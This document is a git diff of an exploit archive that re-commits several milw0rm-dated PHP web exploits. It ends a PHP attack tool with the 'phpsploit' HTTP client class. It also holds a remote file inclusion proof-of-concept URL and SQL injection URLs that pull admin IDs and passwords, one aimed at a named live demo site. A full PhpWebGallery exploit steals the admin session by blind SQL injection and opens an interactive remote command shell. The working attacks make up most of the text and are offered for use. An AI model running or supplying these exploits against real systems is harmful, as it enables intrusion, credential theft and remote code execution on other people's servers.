+		$dsize  = 1;
+		$offset = 0;
+		
+		while($dsize>0)
+		{
+			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
+			
+			$dsize = hexdec(substr($data, $offset, $hsize_size));
+			
+			# Remove $hsize\r\n from $data
+			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
+			
+			$offset += $dsize;
+			
+			# Remove the \r\n before the next $hsize
+			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
+		}
+		
+		return $data;
+	}
+}
+
+# PHPsploitClass
+
+/*
+ * 
+ * Copyright (C) darkfig
+ * 
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ * 
+ * TITLE:          PhpSploit Class
+ * REQUIREMENTS:   PHP 4 / PHP 5
+ * VERSION:        2.0
+ * LICENSE:        GNU General Public License
+ * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
+ * FILENAME:       phpsploitclass.php
+ *
+ * CONTACT:        gmdarkfig@gmail.com (french / english)
+ * GREETZ:         Sparah, Ddx39
+ *
+ * DESCRIPTION:
+ * The phpsploit is a class implementing a web user agent.
+ * You can add cookies, headers, use a proxy server with (or without) a
+ * basic authentification. It supports the GET and the POST method. It can
+ * also be used like a browser with the cookiejar() function (which allow
+ * a server to add several cookies for the next requests) and the
+ * allowredirection() function (which allow the script to follow all
+ * redirections sent by the server). It can return the content (or the
+ * headers) of the request. Others useful functions can be used for debugging.
+ * A manual is actually in development but to know how to use it, you can
+ * read the comments.
+ *
+ * CHANGELOG:
+ *
+ * [2007-06-10] (2.0)
+ *  * Code: Code optimization
+ *  * New: Compatible with PHP 4 by default
+ *
+ * [2007-01-24] (1.2)
+ *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
+ *  * New: multipart/form-data enctype is now supported 
+ *
+ * [2006-12-31] (1.1)
+ *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
+ *  * New: You can now call the getheader() / getcontent() function without parameters
+ *
+ * [2006-12-30] (1.0)
+ *  * First version
+ * 
+ */
+
+class phpsploit
+{
+	var $proxyhost;
+	var $proxyport;
+	var $host;
+	var $path;
+	var $port;
+	var $method;
+	var $url;
+	var $packet;
+	var $proxyuser;
+	var $proxypass;
+	var $header;
+	var $cookie;
+	var $data;
+	var $boundary;
+	var $allowredirection;
+	var $last_redirection;
+	var $cookiejar;
+	var $recv;
+	var $cookie_str;
+	var $header_str;
+	var $server_content;
+	var $server_header;
+	
+
+	/**
+	 * This function is called by the
+	 * get()/post()/formdata() functions.
+	 * You don't have to call it, this is
+	 * the main function.
+	 *
+	 * @access private
+	 * @return string $this->recv ServerResponse
+	 * 
+	 */
+	function sock()
+	{
+		if(!empty($this->proxyhost) && !empty($this->proxyport))
+		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
+		else
+		   $socket = @fsockopen($this->host,$this->port);
+		
+		if(!$socket)
+		   die("Error: Host seems down");
+		
+		if($this->method=='get')
+		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
+		   
+		elseif($this->method=='post' or $this->method=='formdata')
+		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
+		   
+		else
+		   die("Error: Invalid method");
+		
+		if(!empty($this->proxyuser))
+		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
+		
+		if(!empty($this->header))
+		   $this->packet .= $this->showheader();
+		   
+		if(!empty($this->cookie))
+		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
+	
+		$this->packet .= 'Host: '.$this->host."\r\n";
+		$this->packet .= "Connection: Close\r\n";
+		
+		if($this->method=='post')
+		{
+			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data."\r\n";
+		}
+		elseif($this->method=='formdata')
+		{
+			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
+			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
+			$this->packet .= $this->data;
+		}
+
+		$this->packet .= "\r\n";
+		$this->recv = '';
+
+		fputs($socket,$this->packet);
+
+		while(!feof($socket))
+		   $this->recv .= fgets($socket);
+
+		fclose($socket);
+
+		if($this->cookiejar)
+		   $this->getcookie();
+
+		if($this->allowredirection)
+		   return $this->getredirection();
+		else
+		   return $this->recv;
+	}
+	
+
+	/**
+	 * This function allows you to add several
+	 * cookies in the request.
+	 * 
+	 * @access  public
+	 * @param   string cookn CookieName
+	 * @param   string cookv CookieValue
+	 * @example $this->addcookie('name','value')
+	 * 
+	 */
+	function addcookie($cookn,$cookv)
+	{
+		if(!isset($this->cookie))
+		   $this->cookie = array();
+
+		$this->cookie[$cookn] = $cookv;
+	}
+
+
+	/**
+	 * This function allows you to add several
+	 * headers in the request.
+	 *
+	 * @access  public
+	 * @param   string headern HeaderName
+	 * @param   string headervalue Headervalue
+	 * @example $this->addheader('Client-IP', '128.5.2.3')
+	 * 
+	 */
+	function addheader($headern,$headervalue)
+	{
+		if(!isset($this->header))
+		   $this->header = array();
+		   
+		$this->header[$headern] = $headervalue;
+	}
+
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server. Several methods
+	 * are supported.
+	 * 
+	 * @access  public
+	 * @param   string proxy ProxyHost
+	 * @param   integer proxyp ProxyPort
+	 * @example $this->proxy('localhost',8118)
+	 * @example $this->proxy('localhost:8118')
+	 * 
+	 */
+	function proxy($proxy,$proxyp='')
+	{
+		if(empty($proxyp))
+		{
+			$proxarr = explode(':',$proxy);
+			$this->proxyhost = $proxarr[0];
+			$this->proxyport = (int)$proxarr[1];
+		}
+		else 
+		{
+			$this->proxyhost = $proxy;
+			$this->proxyport = (int)$proxyp;
+		}
+
+		if($this->proxyport > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+
+	/**
+	 * This function allows you to use an
+	 * http proxy server which requires a
+	 * basic authentification. Several
+	 * methods are supported:
+	 *
+	 * @access  public
+	 * @param   string proxyauth ProxyUser
+	 * @param   string proxypass ProxyPass
+	 * @example $this->proxyauth('user','pwd')
+	 * @example $this->proxyauth('user:pwd');
+	 * 
+	 */
+	function proxyauth($proxyauth,$proxypass='')
+	{
+		if(empty($proxypass))
+		{
+			$posvirg = strpos($proxyauth,':');
+			$this->proxyuser = substr($proxyauth,0,$posvirg);
+			$this->proxypass = substr($proxyauth,$posvirg+1);
+		}
+		else
+		{
+			$this->proxyuser = $proxyauth;
+			$this->proxypass = $proxypass;
+		}
+	}
+
+
+	/**
+	 * This function allows you to set
+	 * the 'User-Agent' header.
+	 * 
+	 * @access  public
+	 * @param   string useragent Agent
+	 * @example $this->agent('Firefox')
+	 * 
+	 */
+	function agent($useragent)
+	{
+		$this->addheader('User-Agent',$useragent);
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->header_str Headers
+	 * @example $this->showheader()
+	 * 
+	 */
+	function showheader()
+	{
+		$this->header_str = '';
+		
+		if(!isset($this->header))
+		   return;
+		   
+		foreach($this->header as $name => $value)
+		   $this->header_str .= $name.': '.$value."\r\n";
+		   
+		return $this->header_str;
+	}
+
+	
+	/**
+	 * This function returns the cookies
+	 * which will be in the next request.
+	 * 
+	 * @access  public
+	 * @return  string $this->cookie_str Cookies
+	 * @example $this->showcookie()
+	 * 
+	 */
+	function showcookie()
+	{
+		$this->cookie_str = '';
+		
+		if(!isset($this->cookie))
+		   return;
+		
+		foreach($this->cookie as $name => $value)
+		   $this->cookie_str .= $name.'='.$value.'; ';
+
+		return $this->cookie_str;
+	}
+
+
+	/**
+	 * This function returns the last
+	 * formed http request.
+	 * 
+	 * @access  public
+	 * @return  string $this->packet HttpPacket
+	 * @example $this->showlastrequest()
+	 * 
+	 */
+	function showlastrequest()
+	{
+		if(!isset($this->packet))
+		   return;
+		else
+		   return $this->packet;
+	}
+
+
+	/**
+	 * This function sends the formed
+	 * http packet with the GET method.
+	 * 
+	 * @access  public
+	 * @param   string url Url
+	 * @return  string $this->sock()
+	 * @example $this->get('localhost/index.php?var=x')
+	 * @example $this->get('http://localhost:88/tst.php')
+	 * 
+	 */
+	function get($url)
+	{
+		$this->target($url);
+		$this->method = 'get';
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function sends the formed
+	 * http packet with the POST method.
+	 *
+	 * @access  public
+	 * @param   string url  Url
+	 * @param   string data PostData
+	 * @return  string $this->sock()
+	 * @example $this->post('http://localhost/','helo=x')
+	 * 
+	 */	
+	function post($url,$data)
+	{
+		$this->target($url);
+		$this->method = 'post';
+		$this->data = $data;
+		return $this->sock();
+	}
+	
+
+	/**
+	 * This function sends the formed http
+	 * packet with the POST method using
+	 * the multipart/form-data enctype.
+	 * 
+	 * @access  public
+	 * @param   array array FormDataArray
+	 * @return  string $this->sock()
+	 * @example $formdata = array(
+	 *                      frmdt_url => 'http://localhost/upload.php',
+	 *                      frmdt_boundary => '123456', # Optional
+	 *                      'var' => 'example',
+	 *                      'file' => array(
+	 *                                frmdt_type => 'image/gif',  # Optional
+	 *                                frmdt_transfert => 'binary' # Optional
+	 *                                frmdt_filename => 'hello.php,
+	 *                                frmdt_content => ''));
+	 *          $this->formdata($formdata);
+	 * 
+	 */
+	function formdata($array)
+	{
+		$this->target($array[frmdt_url]);
+		$this->method = 'formdata';
+		$this->data = '';
+		
+		if(!isset($array[frmdt_boundary]))
+		   $this->boundary = 'phpsploit';
+		else
+		   $this->boundary = $array[frmdt_boundary];
+
+		foreach($array as $key => $value)
+		{
+			if(!preg_match('#^frmdt_(boundary|url)#',$key))
+			{
+				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
+				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
+				
+				if(!is_array($value))
+				{
+					$this->data .= "\r\n\r\n".$value."\r\n";
+				}
+				else
+				{
+					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
+
+					if(isset($array[$key][frmdt_type]))
+					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
+
+					if(isset($array[$key][frmdt_transfert]))
+					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
+
+					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
+				}
+			}
+		}
+
+		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
+		return $this->sock();
+	}
+
+	
+	/**
+	 * This function returns the content
+	 * of the server response, without
+	 * the headers.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_content
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->get('http://localhost/'))
+	 * 
+	 */
+	function getcontent($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_content = '';
+		
+		for($i=1;$iserver_content .= $code[$i];
+
+		return $this->server_content;
+	}
+
+	
+	/**
+	 * This function returns the headers
+	 * of the server response, without
+	 * the content.
+	 * 
+	 * @access  public
+	 * @param   string code ServerResponse
+	 * @return  string $this->server_header
+	 * @example $this->getcontent()
+	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
+	 * 
+	 */
+	function getheader($code='')
+	{
+		if(empty($code))
+		   $code = $this->recv;
+
+		$code = explode("\r\n\r\n",$code);
+		$this->server_header = $code[0];
+		
+		return $this->server_header;
+	}
+
+	
+	/**
+	 * This function is called by the
+	 * cookiejar() function. It adds the
+	 * value of the "Set-Cookie" header
+	 * in the "Cookie" header for the
+	 * next request. You don't have to
+	 * call it.
+	 * 
+	 * @access private
+	 * @param  string code ServerResponse
+	 * 
+	 */
+	function getcookie()
+	{
+		foreach(explode("\r\n",$this->getheader()) as $header)
+		{
+			if(preg_match('/set-cookie/i',$header))
+			{
+				$fequal = strpos($header,'=');
+				$fvirgu = strpos($header,';');
+				
+				// 12=strlen('set-cookie: ')
+				$cname  = substr($header,12,$fequal-12);
+				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
+				
+				$this->cookie[trim($cname)] = trim($cvalu);
+			}
+		}
+	}
+
+
+	/**
+	 * This function is called by the
+	 * get()/post() functions. You
+	 * don't have to call it.
+	 *
+	 * @access  private
+	 * @param   string urltarg Url
+	 * @example $this->target('http://localhost/')
+	 * 
+	 */
+	function target($urltarg)
+	{
+		if(!ereg('^http://',$urltarg))
+		   $urltarg = 'http://'.$urltarg;
+		   
+		$urlarr     = parse_url($urltarg);
+		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
+		
+		if(isset($urlarr['query']))
+		   $this->url .= '?'.$urlarr['query'];
+		
+		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
+		$this->host = $urlarr['host'];
+		
+		if($this->port != '80')
+		   $this->host .= ':'.$this->port;
+
+		if(!isset($urlarr['path']) or empty($urlarr['path']))
+		   die("Error: No path precised");
+
+		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
+
+		if($this->port > 65535)
+		   die("Error: Invalid port number");
+	}
+	
+	
+	/**
+	 * If you call this function,
+	 * the script will extract all
+	 * 'Set-Cookie' headers values
+	 * and it will automatically add
+	 * them into the 'Cookie' header
+	 * for all next requests.
+	 *
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->cookiejar(0)
+	 * @example $this->cookiejar(1)
+	 * 
+	 */
+	function cookiejar($code)
+	{
+		if($code=='0')
+		   $this->cookiejar=FALSE;
+
+		elseif($code=='1')
+		   $this->cookiejar=TRUE;
+	}
+
+
+	/**
+	 * If you call this function,
+	 * the script will follow all
+	 * redirections sent by the server.
+	 * 
+	 * @access  public
+	 * @param   integer code 1(enabled) 0(disabled)
+	 * @example $this->allowredirection(0)
+	 * @example $this->allowredirection(1)
+	 * 
+	 */
+	function allowredirection($code)
+	{
+		if($code=='0')
+		   $this->allowredirection=FALSE;
+		   
+		elseif($code=='1')
+		   $this->allowredirection=TRUE;
+	}
+
+	
+	/**
+	 * This function is called if
+	 * allowredirection() is enabled.
+	 * You don't have to call it.
+	 *
+	 * @access private
+	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+	 * @return string $this->get($this->last_redirection)
+	 * @return string $this->recv;
+	 * 
+	 */
+	function getredirection()
+	{
+		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+		{
+			$this->last_redirection = trim($codearr[2]);
+			
+			if(!ereg('://',$this->last_redirection))
+			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+			else
+			   return $this->get($this->last_redirection);
+		}
+		else
+		   return $this->recv;
+	}
+
+
+	/**
+	 * This function allows you
+	 * to reset some parameters.
+	 * 
+	 * @access  public
+	 * @param   string func Param
+	 * @example $this->reset('header')
+	 * @example $this->reset('cookie')
+	 * @example $this->reset()
+	 * 
+	 */
+	function reset($func='')
+	{
+		switch($func)
+		{
+			case 'header':
+			$this->header = array();
+			break;
+				
+			case 'cookie':
+			$this->cookie = array();
+			break;
+				
+			default:
+			$this->cookiejar = '';
+			$this->header = array();
+			$this->cookie = array();
+			$this->allowredirection = '';
+			break;
+		}
+	}
+}
+
+?>
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6751.txt b/platforms/php/webapps/6751.txt
index ed24a7f93..36b35a39b 100755
--- a/platforms/php/webapps/6751.txt
+++ b/platforms/php/webapps/6751.txt
@@ -1,30 +1,30 @@
-**************************************************************************************
-
-Author : DaRkLiFe
-Greetz : str0ke & S.W.A.T. & funkys0ul
-
-**************************************************************************************
-Script   :
-
-SezHoo 0.1 Remote File Inclusion Vulnerability
-
-Download:
-
-http://downloads.sourceforge.net/sezhoo/sezhoo.tar.gz?modtime=1220554562&big_mirror=0
-
-**************************************************************************************
-
-Exploit :
-
-http://site.com/sezhoo/SezHooTabsAndActions.php?IP=Sh3lLz?
-
-**************************************************************************************
-
-Vulnerable : line 21 : require_once( "$IP/includes/Defines.php" );
-
-**************************************************************************************
-
-THANKS ! GREETZ ! HAPPY DIWALI !
-**************************************************************************************
-
-# milw0rm.com [2008-10-14]
+**************************************************************************************
+
+Author : DaRkLiFe
+Greetz : str0ke & S.W.A.T. & funkys0ul
+
+**************************************************************************************
+Script   :
+
+SezHoo 0.1 Remote File Inclusion Vulnerability
+
+Download:
+
+http://downloads.sourceforge.net/sezhoo/sezhoo.tar.gz?modtime=1220554562&big_mirror=0
+
+**************************************************************************************
+
+Exploit :
+
+http://site.com/sezhoo/SezHooTabsAndActions.php?IP=Sh3lLz?
+
+**************************************************************************************
+
+Vulnerable : line 21 : require_once( "$IP/includes/Defines.php" );
+
+**************************************************************************************
+
+THANKS ! GREETZ ! HAPPY DIWALI !
+**************************************************************************************
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6754.txt b/platforms/php/webapps/6754.txt
index ac9ace40e..1d29cf3fb 100755
--- a/platforms/php/webapps/6754.txt
+++ b/platforms/php/webapps/6754.txt
@@ -1,37 +1,37 @@
-###############################################################################################
- _____    ____   __  ___    ______   ______       |   ____   _____     _____
-|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
-|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
-|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
-|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
-
-# Author : Hakxer
-# Home : Www.educ-up.com
-# Type Gap : Sq1 inj3ct1on
-# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm
-# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil
-# Team : EgY Coders 
-#################################################################################################
-####### [+] Bug in : success_story.php
-## Dork : " Developed by Infoware Solutions "
-### POC
-      http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
-	  
-### Exploit iN L!ve Script 
-#   [+] Get Version & Database Name [~]
-#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
-#   [+] Get ID&Pass [~] 
-#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--
-
-# [+] HaVe Fun .. ^_^ ;
-
-
-###############################################################################
-
--------------------------------- The End of Gap -----------------------------------
-
-## Contact : aq5@windowslive.com
-### Muslim Hacker .. I love you Mohammed Rasull Allah 
-######################################################
-
-# milw0rm.com [2008-10-14]
+###############################################################################################
+ _____    ____   __  ___    ______   ______       |   ____   _____     _____
+|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
+|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
+|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
+|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|
+
+# Author : Hakxer
+# Home : Www.educ-up.com
+# Type Gap : Sq1 inj3ct1on
+# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm
+# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil
+# Team : EgY Coders 
+#################################################################################################
+####### [+] Bug in : success_story.php
+## Dork : " Developed by Infoware Solutions "
+### POC
+      http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
+	  
+### Exploit iN L!ve Script 
+#   [+] Get Version & Database Name [~]
+#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
+#   [+] Get ID&Pass [~] 
+#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--
+
+# [+] HaVe Fun .. ^_^ ;
+
+
+###############################################################################
+
+-------------------------------- The End of Gap -----------------------------------
+
+## Contact : aq5@windowslive.com
+### Muslim Hacker .. I love you Mohammed Rasull Allah 
+######################################################
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6755.php b/platforms/php/webapps/6755.php
index e6999e206..d7e50e575 100755
--- a/platforms/php/webapps/6755.php
+++ b/platforms/php/webapps/6755.php
@@ -1,172 +1,172 @@
-$b['.$sort.'];' )
-	64.	  );
-	
-	An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
-	to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
-	access to the plugins management interface, but the attacker might be able to retrieve a valid
-	admin session id using the SQL injection bug in comments.php (see lines 325-340)
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout",5);
-
-define(STDIN, fopen("php://stdin", "r"));
-define(PATTERN, "/(.*)<\/span> -/");
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...\n";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-function check_target()
-{
-	global $host, $path, $prefix, $default_record;
-	
-	$packet  = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-
-	preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
-	$prefix = $match[1];
-	
-	preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
-	$default_record = $match[1];
-	
-	preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
-	if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
-}
-
-function encodeSQL($sql)
-{
-	for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
-	return "CONCAT(0x{$encoded})";
-}
-
-function get_sid()
-{
-	global $host, $path, $prefix, $default_record;
-	
-	$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z
-	$index = 1;
-	$sid   = "";
-	
-	$packet  = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-	
-	print "\n[-] Fetching admin SID: ";
-	
-	while (!strpos($sid, chr(0)))
-	{
-		for ($i = 0, $n = count($chars); $i <= $n; $i++)
-		{
-			if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
-			
-			$sql  = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
-				"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
-					
-			preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);	
-			if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
-		}
-		
-		$index++;
-	}
-	
-	print "\n";
-	return $sid;
-}
-
-function check_plugin()
-{
-	global $host, $path, $sid;
-	
-	$packet  = "GET {$path}%s HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Cookie: pwg_id={$sid}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-	
-	// check if the event_tracer plugin isn't installed
-	if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php"))))
-	{
-		http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
-		http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
-	}	
-}
-
-print "\n+---------------------------------------------------------------------------+";
-print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
-print "\n+---------------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage...: php $argv[0] host path [sid]\n";
-	print "\nhost....: target server (ip/hostname)";
-	print "\npath....: path to PhpWebGallery directory";
-	print "\nsid.....: a valid admin session id\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-check_target();
-
-$sid = (isset($argv[3])) ? $argv[3] : get_sid();
-
-check_plugin();
-
-$code	 = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
-$packet  = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Cookie: pwg_id={$sid}\r\n";
-$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
-
-while(1)
-{
-	print "\nphpwebgallery-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
-		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-10-14]
+$b['.$sort.'];' )
+	64.	  );
+	
+	An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
+	to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
+	access to the plugins management interface, but the attacker might be able to retrieve a valid
+	admin session id using the SQL injection bug in comments.php (see lines 325-340)
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout",5);
+
+define(STDIN, fopen("php://stdin", "r"));
+define(PATTERN, "/(.*)<\/span> -/");
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...\n";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+function check_target()
+{
+	global $host, $path, $prefix, $default_record;
+	
+	$packet  = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+
+	preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
+	$prefix = $match[1];
+	
+	preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
+	$default_record = $match[1];
+	
+	preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
+	if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
+}
+
+function encodeSQL($sql)
+{
+	for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
+	return "CONCAT(0x{$encoded})";
+}
+
+function get_sid()
+{
+	global $host, $path, $prefix, $default_record;
+	
+	$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z
+	$index = 1;
+	$sid   = "";
+	
+	$packet  = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+	
+	print "\n[-] Fetching admin SID: ";
+	
+	while (!strpos($sid, chr(0)))
+	{
+		for ($i = 0, $n = count($chars); $i <= $n; $i++)
+		{
+			if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
+			
+			$sql  = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
+				"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
+					
+			preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);	
+			if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
+		}
+		
+		$index++;
+	}
+	
+	print "\n";
+	return $sid;
+}
+
+function check_plugin()
+{
+	global $host, $path, $sid;
+	
+	$packet  = "GET {$path}%s HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Cookie: pwg_id={$sid}\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+	
+	// check if the event_tracer plugin isn't installed
+	if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php"))))
+	{
+		http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
+		http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
+	}	
+}
+
+print "\n+---------------------------------------------------------------------------+";
+print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
+print "\n+---------------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage...: php $argv[0] host path [sid]\n";
